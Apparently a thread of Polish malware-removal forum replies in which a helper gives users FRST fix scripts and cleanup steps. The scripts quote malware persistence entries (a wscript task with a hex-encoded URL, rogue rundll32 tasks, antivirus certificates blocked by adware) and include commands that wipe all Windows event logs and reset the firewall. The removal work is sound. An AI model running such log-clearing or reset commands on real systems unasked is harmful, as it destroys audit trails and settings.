Miszel03

Sprawdziłem adres IP, z którego logujesz się do Nas na forum, czyli 79.xxx.xxx.248 (adres zamazałem ze względów Twojego bezpieczeństwa - pełny masz na PW). Ten adres IP jest notowany w bazie DNSBL jako adres wykorzystywany w atakach spamowych. Rozwiązanie jest następujące: poproś operatora o przydzielenie Ci nowego adresu IP lub po prostu spróbuj zresetować router (w niektórych przypadkach nowe IP przydzielane jest właśnie wtedy). Po otrzymaniu nowego adresu IP zmień hasło do konta Gmail. Teoretycznie mógłbyś zgłosić prośbę o usunięcie tego IP z baz antyspamowych, ale to raczej mozolne zadanie i mogąca nie przynieść skutków. W raptach zaś brak oznak infekcji i w spoilerze zadaję tylko kosmetykę systemową (kasacja martwych wpisów / resztek po wcześniej odinstalowanych programach)

Wszystkie detekcje MBAM daj do usunięcia. System posprzątany, powiedz jak podsumowujesz obecną sytuację.

A gdzie log Addition?

W raportach (jak już wcześniej mówiłem) brak oznak infekcji. W mojej opinii tak. Skonsultuję się jeszcze z picasso.

Poradnikiem z DP proszę się nie sugerować, nie wiadomo jak infekcje integruję w przeglądarce - instalacja rozszerzenia to może być zmiana zewnętrzna, a za nią może iść szereg innych zmian. Wymagana jest kompleksowa deinstalacja przeglądarki i postawienie jej na nowo. Oprócz tego system będzie sprzątany z resztek po odinstalowanym wcześniej oprogramowaniu. Rozumiem, że MBAM uruchamia się bez przeszkód? 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia HKU\S-1-5-21-3323102121-1666990563-3921265713-1000\Software\Microsoft\Internet Explorer\Main,Start Page = S3 Disc Soft Lite Bus Service; "d:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe" [X] ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits\Windows Software Development Kit\Documentation for Desktop Apps.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits\Windows Software Development Kit\Documentation for Windows Store Apps.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits\Windows Software Development Kit\Samples for Desktop Apps.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits\Windows Software Development Kit\Samples for Windows Store Apps.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits\Windows Software Development Kit\Tools for Desktop Apps.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits\Windows Software Development Kit\Tools for Windows Store Apps.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware\Deinstalacja programu Malwarebytes Anti-Malware.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware\Malwarebytes Anti-Malware.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware\Tools\Malwarebytes Anti-Malware Chameleon.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\JetBrains\IntelliJ IDEA Community Edition 2016.2.5.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG Zen\AVG.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Atlassian\SourceTree\Check For Updates.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Atlassian\SourceTree\SourceTree.lnk C:\Users\Dominika\Links\studia-pk-mp-lab-projekt.lnk C:\Users\Dominika\AppData\Roaming\Microsoft\Word\MIMJESTFAJNENO1306241710545687213\MIMJESTFAJNENO1.doc.lnk C:\Users\Dominika\AppData\Roaming\Microsoft\Office\Niedawny\15d1c012fddd7e815df3eb7c5c4b0435.LNK C:\Users\Dominika\AppData\Roaming\Microsoft\Office\Niedawny\790ca457c73f73a91368711f4278c749.LNK C:\Users\Dominika\AppData\Roaming\Microsoft\Office\Niedawny\exe_wd_1.LNK C:\Users\Dominika\AppData\Roaming\Microsoft\Office\Niedawny\Formularz zgloszenia kandydata - I stopien.LNK C:\Users\Dominika\AppData\Roaming\Microsoft\Office\Niedawny\info (1).LNK C:\Users\Dominika\AppData\Roaming\Microsoft\Office\Niedawny\info.LNK C:\Users\Dominika\AppData\Roaming\Microsoft\Office\Niedawny\plakat-na-inaugurację.LNK C:\Users\Dominika\AppData\Roaming\Microsoft\Office\Niedawny\plan lekcji.LNK C:\Users\Dominika\AppData\Roaming\Microsoft\Office\Niedawny\Test1.LNK C:\Users\Dominika\AppData\Roaming\Microsoft\Office\Niedawny\wz13.LNK C:\Users\Dominika\AppData\Roaming\Microsoft\Office\Niedawny\wz5.LNK DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Dominika\AppData\Local\Mozilla C:\Users\Dominika\AppData\Roaming\Mozilla C:\Users\Dominika\AppData\Roaming\Profiles Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Kompleksowo przeinstaluj przeglądarkę Google Chrome: Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt. Sprawdź również czy infekcja ustąpiła.

Nie dostarczyłeś raportu z czyszczenia, więc będziemy musieli powtórzyć tą akcje (patrz pkt. 3). Konkretnej infekcji nie widzę, aczkolwiek polityki grup ustawione na Google Chrome mogą świadczyć o modyfikacji samej przeglądarki (więc zadaję jej kompleksowe czyszczenie). 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: Task: {6743A721-CFE6-4E3A-9B2A-6AB12BDE6813} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia GroupPolicy: Ograniczenia S2 RtNdPt630; \SystemRoot\system32\DRIVERS\RtNdPt630.sys [X] S3 RTTEAMPT; \SystemRoot\system32\DRIVERS\RtTeam620.sys [X] S3 RTVLANPT; \SystemRoot\system32\DRIVERS\RtVlan620.sys [X] Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. 3. Zastosuj AdwCleaner z opcji Szukaj (nie stosuj jeszcze Oczyść). Dostarcz raport z tego działania. 4. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

W mojej opinii jest tak, że został Ci przydzielony adres, który już kiedyś był w nieciekawym miejscu, a Ty nie masz po prostu na to wpływu. Rozwiązanie jest następujące: poproś operatora o przydzielenie Ci nowego adresu IP. Nic więcej nie mogę tutaj poradzić. Ewentualnie możesz zrobić nowy zestaw raportów FRST, dla Twojej pewności.

Temat przenoszę do działu Hardware.

System jest zainfekowany, ale nie mogę sklasyfikować nazwy winowajcy. Usunę podejrzane elementy z systemu i wdrożymy skan antywirusowy. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{022105BD-948A-40C9-AB42-A3300DDF097F}\localserver32 -> "C:\Users\OK\AppData\Local\Google\Update\GoogleUpdate.exe" => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\OK\AppData\Local\Google\Update\1.3.33.5\psuser.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\OK\AppData\Local\Microsoft\OneDrive\17.3.6799.0327\FileCoAuthLib.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{22181302-A8A6-4F84-A541-E5CBFC70CC43}\localserver32 -> "C:\Users\OK\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateOnDemand.exe" => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{2F0E2680-9FF5-43C0-B76E-114A56E93598}\localserver32 -> "C:\Users\OK\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateOnDemand.exe" => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{51F9E8EF-59D7-475B-A106-C7EA6F30C119}\localserver32 -> "C:\Users\OK\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateOnDemand.exe" => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\OK\AppData\Local\Google\Update\1.3.30.3\psuser.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\OK\AppData\Local\Google\Update\1.3.31.5\psuser.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\OK\AppData\Local\Google\Update\1.3.29.5\psuser.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\OK\AppData\Local\Google\Update\1.3.33.3\psuser.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{C3101A8B-0EE1-4612-BFE9-41FFC1A3C19D}\InprocServer32 -> C:\Users\OK\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{C442AC41-9200-4770-8CC0-7CDB4F245C55}\InprocServer32 -> C:\Users\OK\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\OK\AppData\Local\Google\Update\1.3.32.8\psuser.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\OK\AppData\Local\Google\Update\1.3.29.1\psuser.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{E67BE843-BBBE-4484-95FB-05271AE86750}\localserver32 -> "C:\Users\OK\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateOnDemand.exe" => Brak pliku CustomCLSID: HKU\S-1-5-21-469927386-569436938-3138798766-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\OK\AppData\Local\Google\Update\1.3.33.5\psuser.dll => Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku Task: {FABD849F-0BAD-4CB9-8D95-3B31D66A1B9C} - System32\Tasks\Chromium liror => C:\Windows\system32\wscript.exe "C:\ProgramData\{4348862B-C90A-0CED-4FCC-92AFD58E1961}\dife.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b34333438383632422d433930412d304345442d344643432d3932414644353845313936317d5c6d6f6c6f6665" "433a5c50726f6772616d446174615c7b34333438383632422d433930412d304345442d (dane wartości zawierają 84 znaków więcej). Task: C:\Windows\Tasks\Chromium liror.job => Wscript.exe C:\ProgramData\{4348862B-C90A-0CED-4FCC-92AFD58E1961}\dife.txt Task: C:\Windows\Tasks\{02B889B6-6CA1-291D-E186-0D112ADCACA6}.job => C:\Users\OK\AppData\Local\02B889~1\sync.exe Task: {05B3FF01-392D-43AA-8D2A-F27AA6720149} - System32\Tasks\{02B889B6-6CA1-291D-E186-0D112ADCACA6} => C:\Users\OK\AppData\Local\02b889b66ca1291de1860d112adcaca6\sync.exe [2013-05-04] () C:\ProgramData\{4348862B-C90A-0CED-4FCC-92AFD58E1961} C:\Users\OK\AppData\Local\02b889b66ca1291de1860d112adcaca6 C:\Users\OK\AppData\Local\02B889~1 HKU\S-1-5-21-469927386-569436938-3138798766-1001\...\Run: [Chromium] => c:\users\ok\appdata\local\chromium\application\chrome.exe [1419776 2017-08-04] (The Chromium Authors) HKU\S-1-5-21-469927386-569436938-3138798766-1001\...\Run: [GoogleChromeAutoLaunch_FD18F6954B7F97E501B839AC3215DD2B] => C:\Users\OK\AppData\Local\chromium\Application\chrome.exe [1419776 2017-08-04] (The Chromium Authors) U0 msahci; system32\drivers\msahci.sys [X] C:\Users\OK\AppData\Local\Microsoft\Windows\Application Shortcuts\AD2F1837.HPPrinterControl_v10z8vjag6ke6\AD2F1837.HPPrinterControl.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\OK\AppData\Local\Mozilla C:\Users\OK\AppData\Roaming\Mozilla C:\Users\OK\AppData\Roaming\Profiles CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\OK\AppData\Local CMD: dir /a C:\Users\OK\AppData\LocalLow CMD: dir /a C:\Users\OK\AppData\Roaming Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Poproszę o przefiltrowany skan integralności systemu Windows z opcji sfc /scannow, to pozwoli ustalić czy system jest w jakimś miejscu uszkodzony.

Jakie konkretnie? Wygląda na to, że to nie infekcje powodują problemy z wydajnością, bo ich nie widzę. Pobierzemy najnowsze dane z Dziennika Zdarzeń. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe U3 idsvc; Brak ImagePath U3 wpcsvc; Brak ImagePath ContextMenuHandlers1: [7-Zip] -> [CC]{23170F69-40C1-278A-1000-000100020000} => -> Brak pliku ContextMenuHandlers4: [7-Zip] -> [CC]{23170F69-40C1-278A-1000-000100020000} => -> Brak pliku ContextMenuHandlers4: [sHAREit.FileContextMenuExt] -> [CC]{430BD134-576D-4E75-87CD-0F5C6221A82B} => -> Brak pliku ContextMenuHandlers1: [sHAREit.FileContextMenuExt] -> {430BD134-576D-4E75-87CD-0F5C6221A82B} => -> Brak pliku ContextMenuHandlers1: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> Brak pliku ContextMenuHandlers1: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Brak pliku ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} => -> Brak pliku ContextMenuHandlers1_S-1-5-21-1360549727-2693629194-3738010788-1000: [GGDriveMenu] -> [CC]{E68D0A55-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ContextMenuHandlers4_S-1-5-21-1360549727-2693629194-3738010788-1000: [GGDriveMenu] -> [CC]{E68D0A55-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku Task: {06628A80-489A-497B-B6E8-28B7AEEA3FE5} - System32\Tasks\{7D13D80C-D8A8-4475-A076-DFF9C0C8751F} => C:\Windows\system32\pcalua.exe -a C:\Users\admin\AppData\Local\Temp\jre-8u73-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i koniecznie Shortcut. Dołącz też plik fixlog.txt.

Jednak nalegałbym na wygenerowaniu raportów FRST. P.S: Zgłoszenie niezasadne - na forum nie kasujemy tematów, które nie łamią regulaminu.

Patrz pkt. 2. Picasso naświetliła Ci sytuację, więc ja zabieram się od razu do roboty. WMI zostawiam na koniec, bo są tutaj resztki infekcji i blokady, które trzeba uprzątnąć w pierwszej kolejności. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKEY_LOCAL_MACHINE\SYSTEM\VritualRoot\MACHINE\SOFTWARE\WOW6432Node\Firefox HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = U0 aswVmm; Brak ImagePath 2017-10-15 00:37 - 2017-10-15 00:37 - 000003584 _____ C:\Windows\SECOH-QAD.dll 2017-10-16 19:27 - 2016-12-09 02:39 - 000000040 _____ C:\Program Files (x86)\settings.dat ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku C:\Users\Rafał\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\deb74e6ef302b553\Speed Dial [FVD] - New Tab Page, 3D, Sync.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Rafał\AppData\Local\Mozilla C:\Users\Rafał\AppData\Roaming\Mozilla C:\Users\Rafał\AppData\Roaming\Profiles CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Rafał\AppData\Local CMD: dir /a C:\Users\Rafał\AppData\LocalLow CMD: dir /a C:\Users\Rafał\AppData\Roaming CMD: netsh advfirewall reset Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Postaw nowy, czysty fabrycznie profil w przeglądarce Google Chrome. Otwórz przeglądarkę Google Chrome: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę > dodaj osobę, zaloguj się na nią, poprzednie okno sesji zamknij > wejdź ponownie w Osoby i skasuj wszystkie poprzednie profile / osoby. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Zrób raport z Farbar Service Scanner. Oczywiście pomogę, bo po to tu jestem. P.S: Takie zakładanie kilku tematów z prośba o pomoc to kompletny brak szacunku dla Nas (i mówię tu o wszystkich Helperach w Polsce). Tracimy czas na przetwarzanie tematów, które już gdzieś zostały przetworzone...

W takim razie temat przenoszę do działu Hardware, raportów pod kątem infekcji w ogóle nie sprawdzam, bo w obecnej sytuacji dysk i tak może paść w każdej chwili.

Problem tytułowy tworzy infekcja adware wstawiające fałszywe certyfikaty blokujące wielu producentów oprogramowania zabezpieczającego. Poza tym widoczna są fałszywe przeglądarki pod przeglądarkę Google Chrome i Mozilla FireFox (choć ta nie jest zainstalowana). Postaram się to doprowadzić do porządku jak najszybciej, ale musisz wykonywać moje instrukcje 1:1. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers1_S-1-5-21-886091981-26357939-1909133584-1001: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ContextMenuHandlers4_S-1-5-21-886091981-26357939-1909133584-1001: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ContextMenuHandlers5_S-1-5-21-886091981-26357939-1909133584-1001: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku Task: {3ECE7D90-A10A-4450-8AD8-167E6D897580} - System32\Tasks\875o48c79w170 => C:\Windows\system32\rundll32.exe "C:\ProgramData\875o48c79w170\875o48c79w170.dll",ocwfus <==== UWAGA Task: {841226FF-6E7B-497A-AA51-8E43BA4FA855} - System32\Tasks\82635f964l6515z6 => C:\Windows\system32\rundll32.exe "C:\ProgramData\82635f964l6515z6\82635f964l6515z6.dll",ftqflz <==== UWAGA Task: {8CBEE18F-9295-4674-966A-6E1FBFB8CD4E} - System32\Tasks\20507f89248l90000z7 => C:\Windows\system32\rundll32.exe "C:\ProgramData\20507f89248l90000z7\20507f89248l90000z7.dll",ftqflz <==== UWAGA Task: {B2C5E3A1-53C2-40D4-B353-163AA2C2DAB8} - System32\Tasks\6474o18c32w138 => C:\Windows\system32\rundll32.exe "C:\ProgramData\6474o18c32w138\6474o18c32w138.dll",ocwfus <==== UWAGA Task: {F8406313-537B-4A61-A719-DC9B490D2225} - System32\Tasks\1c2bfedd248d3116021ff65c7bf72052 => rundll32.exe "C:\Program Files (x86)\NVIDIA Corporation\ag74t6.dll",e62dc6c6547f46bda862da2d05af6862 <==== UWAGA C:\ProgramData\875o48c79w170 C:\ProgramData\82635f964l6515z6 C:\ProgramData\20507f89248l90000z7 C:\ProgramData\6474o18c32w138 C:\Program Files (x86)\NVIDIA Corporation\ag74t6.dll C:\Users\Rafał\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\deb74e6ef302b553\Speed Dial [FVD] - New Tab Page, 3D, Sync.lnk HKLM\...\RunOnce: [RAFAŁ] => C:\Windows\TEMP\g951D.tmp.exe <==== UWAGA HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) <==== UWAGA HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== UWAGA HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== UWAGA HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== UWAGA HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== UWAGA HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== UWAGA HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== UWAGA HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== UWAGA HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== UWAGA HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== UWAGA HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== UWAGA HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== UWAGA HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== UWAGA HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== UWAGA HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== UWAGA HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== UWAGA HKLM\ DisallowedCertificates: 